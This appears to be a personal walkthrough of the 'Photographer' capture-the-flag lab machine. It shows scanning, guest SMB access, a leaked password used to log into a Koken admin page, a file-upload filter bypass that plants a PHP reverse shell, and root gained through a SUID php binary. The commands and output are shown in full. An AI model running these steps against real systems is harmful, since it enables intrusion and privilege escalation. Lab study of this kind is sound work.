└─$ nmap -sV -sC -p 80,139,445,8000 172.16.33.88 --min-rate 900 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:20 PST
Nmap scan report for 172.16.33.88
Host is up (0.27s latency).

PORT     STATE    SERVICE     VERSION
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Photographer by v1n1v131r4
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  filtered netbios-ssn
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: -789d15h02m55s, deviation: 2h53m14s, median: -789d16h42m56s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2022-11-16T05:38:21-05:00
| smb2-time: 
|   date: 2022-11-16T10:38:22
|_  start_date: N/A
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.95 seconds

//port 139
  ─$ netexec smb 192.168.56.115 -u guest -p ''         
    SMB         192.168.56.115  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True)
    SMB         192.168.56.115  445    PHOTOGRAPHER     [+] \guest: (Guest)

  └─$ netexec smb 192.168.56.115 -u guest -p '' --shares
    SMB         192.168.56.115  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True)
    SMB         192.168.56.115  445    PHOTOGRAPHER     [+] \guest: (Guest)
    SMB         192.168.56.115  445    PHOTOGRAPHER     [*] Enumerated shares
    SMB         192.168.56.115  445    PHOTOGRAPHER     Share           Permissions     Remark
    SMB         192.168.56.115  445    PHOTOGRAPHER     -----           -----------     ------
    SMB         192.168.56.115  445    PHOTOGRAPHER     print$                          Printer Drivers
    SMB         192.168.56.115  445    PHOTOGRAPHER     sambashare      READ            Samba on Ubuntu
    SMB         192.168.56.115  445    PHOTOGRAPHER     IPC$                            IPC Service (photographer server (Samba, Ubuntu))

└─$ smbclient //192.168.56.115/sambashare -N
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Mon Jul 20 18:30:07 2020
      ..                                  D        0  Tue Jul 21 02:44:25 2020
      mailsent.txt                        N      503  Mon Jul 20 18:29:40 2020
      wordpress.bkp.zip                   N 13930308  Mon Jul 20 18:22:23 2020

  └─$ cat mailsent.txt 
      Message-ID: <4129F3CA.2020509@dc.edu>
      Date: Mon, 20 Jul 2020 11:40:36 -0400
      From: Agi Clarence <agi@photographer.com>
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
      X-Accept-Language: en-us, en
      MIME-Version: 1.0
      To: Daisa Ahomi <daisa@photographer.com>
      Subject: To Do - Daisa Website's
      Content-Type: text/plain; charset=us-ascii; format=flowed
      Content-Transfer-Encoding: 7bit
      
      Hi Daisa!
      Your site is ready now.
      Don't forget your secret, my babygirl ;)
//for port 5000, /admin is a login page,  try daisa@photographer.com , babygirl, it works.
//go into a page with right to upload file, but the limitation is jpg,png etc. pic files.
//upload a reverse.php and name it .php.png
// use burp  repeater to modify the sending content, some places remove '.png', sucessful, and listening on the host, then view the reverse shell file.


└─$ nc -nvlp 8888                         
listening on [any] 8888 ...
connect to [192.168.56.105] from (UNKNOWN) [192.168.56.115] 60808
Linux photographer 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 02:04:31 up  1:45,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

//esclate privilege, 
www-data@photographer:/home$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su


//we find php7.2 is in the list
www-data@photographer:/home/daisa$ php -r "pcntl_exec('/bin/sh', ['-p']);"
php -r "pcntl_exec('/bin/sh', ['-p']);"
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

# cat proof.txt
cat proof.txt
                                                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 :o      sMMMMMMMMs.        -hMMMMMMMM/     :o                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com


